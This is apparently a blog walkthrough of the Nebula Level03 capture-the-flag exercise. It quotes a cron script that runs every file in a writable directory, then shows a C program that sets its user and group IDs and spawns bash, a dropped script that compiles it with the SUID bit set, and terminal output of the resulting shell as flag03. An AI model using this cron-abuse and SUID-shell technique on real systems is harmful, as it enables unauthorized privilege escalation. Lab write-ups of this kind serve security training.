2 minute read

The details page for Level03 contains a hint directing us to the home directory of flag03. After navigating to the target home directory and listing out the files, I was presented with a shell script called writable.sh and a directory called writable.d.

I took a look at the shell script and it contained the following:


	for i in /home/flag03/writable.d/* ; do
        	(ulimit -t 5; bash -x "$i")
        	rm -f "$i"

This code will execute anything placed in the writable.d directory when it is called. The details section also mentioned a crontab that is called every couple of minutes.

This challenge was a little tougher because I wanted to gain shell access and not just cat out a log file that contained the getflag output. After trying to approach the problem the same way as Level00, I came up short because bash will ignore the SUID bit.

I went with a different approach and after grabbing the uid/gid from /etc/passwd I created some code to spawn a shell.

	#include <stdio.h>

	int main()
    	setresuid(996, 996, 996);
    	setresgid(996, 996, 996);
    	system( "/bin/bash" );
    	return 0;

Then, I placed a bash script in writable.d that will compile my code.


	gcc /tmp/foo.c -o /home/flag03/level03
	chmod +xs /home/flag03/level03

I waited for cron to run, then moved to /home/flag03 and executed my newly compiled level03 program.

	level04@nebula:/home/flag03$ id
	uid=1004(level03) gid=1004(level03) groups=1004(level03)
	level03@nebula:/home/flag03$ ./level03
	flag03@nebula:/home/flag03$ id
	uid=996(flag03) gid=996(flag03) groups=996(flag03),1004(level03)
	flag03@nebula:/home/flag03$ getflag
	You have successfully executed getflag on a target account

Success! After running the program I was presented with a shell and able to run getflag on a target account.

Thanks for reading!


comments powered by Disqus